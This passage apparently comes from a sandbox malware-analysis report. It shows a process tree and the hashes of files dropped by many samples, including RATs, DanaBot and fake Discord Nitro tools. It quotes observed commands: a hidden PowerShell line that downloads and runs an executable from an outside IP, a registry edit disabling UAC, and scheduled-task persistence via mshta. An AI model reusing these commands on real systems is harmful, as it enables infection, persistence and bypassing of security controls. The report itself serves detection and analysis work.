                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                          PID:4220
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:3292
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn L0zz4maZAkc /tr "mshta C:\Users\Admin\AppData\Local\Temp\QbIhLC57c.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3192
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /create /tn L0zz4maZAkc /tr "mshta C:\Users\Admin\AppData\Local\Temp\QbIhLC57c.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:1496
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    mshta C:\Users\Admin\AppData\Local\Temp\QbIhLC57c.hta
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:484
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KPF3TGVBOQNGCMA8GPCDXWT07TZO3LFI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:2472
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\TempKPF3TGVBOQNGCMA8GPCDXWT07TZO3LFI.EXE
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\TempKPF3TGVBOQNGCMA8GPCDXWT07TZO3LFI.EXE"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:2844
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:4752
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10320830101\15a29f9d89.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10320830101\15a29f9d89.exe"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:3336
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:5396
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:3288
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:5436
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10332250101\p2N9nZJ.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10332250101\p2N9nZJ.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:6832
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10332270101\IrWphh0.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10332270101\IrWphh0.exe"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:8052
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\putty.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\putty.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:3384
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\9EEE.tmp\putty.bat" "C:\Users\Admin\AppData\Local\Temp\putty.exe""
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:3148
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:316
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1288
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3756
                                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1696
                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "1620576640-352045696-538638494-699113369213400761725753062953706521-2031780369"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2804
                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "9054752081247888641315642043-12296820131055386220-1235961361-212479557-407648005"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1664
                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-1267392389647382671370716939-18544452641068644991205333564611282873331594424293"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:1632
                                                                                                                                                                                        • C:\Windows\SysWOW64\sysemkq.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\sysemkq.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:2240
                                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:6060
                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:3684
                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                              taskeng.exe {72B2CA2B-6193-4C14-A560-1CF5372A9505} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:5024
                                                                                                                                                                                                • C:\Program Files\taskhostw.exe
                                                                                                                                                                                                  "C:\Program Files\taskhostw.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5796
                                                                                                                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Discord.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:1872
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Discord.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Discord.exe
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4196

                                                                                                                                                                                                  Network

                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                  • C:\PROGRA~3\Hdlharas\mdkhm.zip

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    56KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    b635f6f767e485c7e17833411d567712

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

                                                                                                                                                                                                  • C:\Program Files\taskhostw.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    226KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9e02078809cf34479e5108fca383862c

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d82926214ea6cc5f1f162eb526a0a54a5b4068b3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    02ff75101c0d1cebbc3b45196cb87634af88447fbd7fca2ffe76a21f1d2be703

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    52624e87e688ebadebb658f6a05db09c5543431b2bdd26141a13bdced80838638097781a0b89bd21b59aa14f64becf92663a93d76c7c7325d01fe70ddd6ec512

                                                                                                                                                                                                  • C:\ProgramData\Hdlharas\dlrarhsiva.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    9.1MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    64261d5f3b07671f15b7f10f2f78da3f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d4f978177394024bb4d0e5b6b972a5f72f830181

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    71KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    83142242e97b8953c386f988aa694e4a

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    69994ff2f00eeca9335ccd502198e05b

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    b13a15a5bea65b711b835ce8eccd2a699a99cead

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    300KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    0c5f210d9488d06c6e0143746cb46a4c

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8c10d61f4fb40acdd99d876c632a3388a9dfbad7

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    bb18b8e5e7c6b5e1cb9535c0910a7175f0871b21aab0238cfd3a5fd0a8e79790d457b0ed15b2c5695ba59595d5019975be8ae02eddf1d4c2381b9c1bf43920d4

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0F768C29_Rar\LoveForyou.scr

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.8MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    789183739b41d876a88e2091b75f0343

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    a2ee6612c3a3eb56848ce9e204acb0d1fba63f6e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    de095132f160cdb9114dbec3e9fdebfa24277d3daf4adf03ca425022d1299605

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    dd199bcdbde2ad421ae708e15696c7a1ce38e9cfaefa13254c1149d5de163fa346c129da08f8f90d01d57b8afb7578ff7ba0f9458466f4df4ae2c5a001e9d082

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10320830101\15a29f9d89.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.8MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    0915a3999060e03815cdcb4f9249f7cd

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    2d53d96bd4e391152e829912ede394b1d3809466

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    753b534c0a96a007637c0dbca6bcfb4590c443d2da78c84079c73c45451f15bd

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5c57c96dfaf333d2f9607735f37991e7d46637f3dd7edb62a5b4c51f8b720f6bb7553fc6df56e1dcdbaa1e07194fb7acaec670831f858fce05021c50cbf6582d

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    a38b838486743b7473b4e993ef6f7895

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    db8b711f84ea5610b1f3a00c83827c0226b372c9

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    843b982f5fe42f642e0f7a3b1c10cddd1bc0e4072e31d6474aff430ef7977960

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    f38b6fe2e2cda920904e553984298066b24411edaab4f8c7388f24bb590044e08967283910dbe063a56c784c26f7ef580f85d496880c5ed9cb98b4850e968da1

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3.7MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9b69bfe722972ef8e87a9b713f9dfc9d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    0de18f00a25702a346ced54b90152afa2003636f

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    b56cea3ef0d518e728c514dbe306a9adb95e62866db0d0c6c3b78af2d869343a

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    a8cdbd0abac994fe82e54c388b8a0ada02b87e48a17fafd470f7d45f385742545034d954a36baf81f9ddb63a6da776b7e78049182956419fb34d33aaa4c8c063

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.9MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    c909efcf6df1f5cab49d335588709324

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    43ace2539e76dd0aebec2ce54d4b2caae6938cd9

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    68c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10332250101\p2N9nZJ.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e5410959ddc64316ee444fa5eb051d10

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    98865676f341ca7d012699e2e8f8abc312119b94

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    6108840a1aaa32b5a1600ff36c99c3f58b5886289f43d7e4c830e801b5cd24a8

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    659af487e169a4c1d35297a17eb71d7714595f3a0f4490b93d3a35c8f4bb7658307c65a43fc5d95979d5c88987491438d917ef957e8b28ca0238477d3315102a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10332270101\IrWphh0.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    974KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9f117b3928eb8d1fcb9fa272de7f485f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f967acf69499dc78ab3c9b24e77100a1a30eebf3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    503e48eb90dc10d17ca2346bd7cd5b964794c94e941bf3fe929332112c82bd10

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    a706511626d886f89846a710b45f8e5d324c6baf1575145ff11edeaa438dfacb57c24c53f7ad7d410d8f17fcd76ce0a22f19c76a3ce0173f73560360bdb5156b

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2020.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    126KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    dd64540e22bf898a65b2a9d02487ac04

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    30dc0f5fde0feeb409cfb5673d69e9ad7c33f903

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    c3f1f481bf8890ae8e6c4687fc73fb9da1b03e5661f4c0961cdf119dfcd72da4

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    8c496d77574199ebea8e2fe2136d7732013edb1df3de68f3cbc73ec3f36028817d7ac9c7bb068498f6100020a58175efb1a10fd77d14f921e4bca04fd41542a2

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2AsMdjci508c.bat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    207B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9428313a038d3a9b970af32990489e29

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    3d37bdcebda04277a79a72becb4d8c8fd20dae15

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0a9e725212cd66206311b26feaa7b0c232cddc1ed049aa24be09bc27735cfe03

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    418e71921b42baa44a967cc56b81ba503d316d2e786a849da9b2f54ea5572d1b95332bd1b260057ecff6a888b42caf36cd5e745db980cc9b85916f9a21e73f62

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3pObrAzl8zLg.bat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    207B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    1ede2be5080addbe67217419bfc95cc3

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    77478322400615984fe460671fbacafc09b60054

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    733f2b871e953b3a8264ea9d882b7a725ca27a9955e51fed449e6cf0e4e0ab04

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    d3263f743fb77c39b201777ebda58bf7eb910cfdf157dc32ab6567c4c828f74dff8ceeacb8df4a1f98775d02b7a600406b12d2b1aa149c236d1d632b5f0571f4

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3vVQsTO5498q.bat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    207B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    133458ffb258c65b0f1ff55aa00e62c5

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    474d928a311608d0ce9ff350fb522e746b906652

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    45902e8ca8ee3bde49696631e4caed9152e65c72727c971788576c14339f6489

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c30fcf0add1e773e07a6b11cd2fdd09891a7d4f521269e6c740b613ef5fabeb9344e6067cacc594d4fed4530dab2cd88e79dd20d46e1c49c9c57fc362b6018df

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9EEE.tmp\putty.bat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    40B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    5dbff324b3bdba08cbb6ac18161d31fa

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    1d7da87db0db52d3755a8bdf066fe2309b9c2860

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0ee0d0d9500088d39c2c67bc5d8f576ecdeab55361caeef53ddf03c33778e2f7

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    3dc1cf30f3733cc6606eda962e8ef8b2ffb883367e97a22f02a1fe09f7ab8f53e6e0b03dc01f55a292e04895c744948e553f5931343777e8eb98eb4718b6fd4e

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AOfmonSkJ6TS.bat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    207B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    a0bb64b4cc9dd86f4028ce2a16a9d54f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    13f88a4285e827d978faee2684e579f76b0764e1

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    6f42a85f913c7a8448b6c88682edc1ab8107ea42b06da4e4e2ecea37cf811351

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    0e2100062b63e55175f6f3e1cd59af92cc76f3f99e15b78a580614c81db5987d260f1763c907d81376cb9da658a3251410144892cc07cf7ecc728d9cd416ba26

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    194KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    1de4e189f9e847758c57a688553b4f8f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    1b1580955779135234e4eb3220857e5a8d5168ac

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    c439e919ee06a37656784b922599febcc1d6e2f9a1d43b9ee053e0af345af557

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    9641fd69a2189a26bbf97b725976e3435597bb6a9b90a1404428dc496bb12ef02b8685eea42167f4a340d9e4df622bfb2725e19723b7459856a96aa8a61cd864

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.6MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    c108c1c76a3676b39aabbcf8aa9efb69

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f340b39f41adc4f47c81b990e5fd214043f1dfbc

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    90b04fd7fe0d8ca43c6aa4affcf5c68a6f977ceeeaba8c0cbfcee4e8435ea460

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    b7e9c67956e5be98adfa8d24fabed4a34972d878ccadba5d55d3e974ba86cf4438d1fc951b424e4575a5d41216b4b5437a73148c64987d32d9960fb2195642de

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DanaBot.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2.7MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    48d8f7bbb500af66baa765279ce58045

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    2cdb5fdeee4e9c7bd2e5f744150521963487eb71

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    104KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    eb6beba0181a014ac8c0ec040cb1121a

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    52805384c7cd1b73944525c480792a3d0319b116

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    f87b4e7c69ce161743f4b9b0001d7376e163d615ce477c390f63cadf09ffc5d4

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    0afb9a7d180fe017520afb39e954821f77c8b6e2e11bbf73402dcdade231d07f3b755f40606252c917b51a0f5f32d499b96b30e7f2f617c50e709eae4cd80ae4

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    444KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    0df064a92858ef4d9e5d034d4f23fa7b

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    aed9a8905ddd7296eb394be451a4d72b7d5442b3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d1afcd5386c713d7439d6fe2e8c2b2548b4b2c748a6873469daa33dc06c1da8f

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c35e914428a2f18d2bffc4ee1e9568c62066b48d8f655a9664e27be19a71183c77bc40c2ad39bd5f89e04a774e06caf83daa61a8f80913d6e6f82f3281ba3760

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EQ7FQHcIwoT1.bat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    207B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    db96a80ca45ed72c7bac3c3eaff8a706

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    cfaca7d4d8249fc1828b4fdc0f3fb0547c5ad0ea

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    db3732527659c3dff5c7c95ffddced854cbc61b6d670236c5aa095cfce2d369e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    e6a48279c55045305cbd19699f552e3791352efc5d23e70e8184f904f30312915ad105edb62fc1ba7712f7dc1a3f3e19420ec9caf2b5d931277664925ea4e541

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    22KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    2ff5f278eceba92ec6afc38f31a21c08

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f9b34e6f7f2fb37ced2146108b4e52269a3835be

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    823e831c3f112251b53dfe90ce379200e4129f28d40ef3c25b1bc98b5c347925

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    10b2d1f2a475652b92271fbe44be2221d5a5e1d964e74212d1a39b3ca75721de1b9e7b1b3920cb43bfe31cdec465d5168b91178aa390402980314028e97bbbc1

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\NFDOM.bat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    121B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    6f03830aff31995957052b694b2211a0

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    bc98df25a4accd29643b311c106e1cdcecdec93c

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    7ddb76d54b187f9e03639ee200536062c36abea7f2fb073ca9bccfb5acc55934

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    f02357a8148e3f0c2e3f8f44c317c94450cbda8acd1890369ad91cd1c140089bfbfd6659702f79761e49b8b665f37667d806ccaed416c6de43e1a99d07a69175

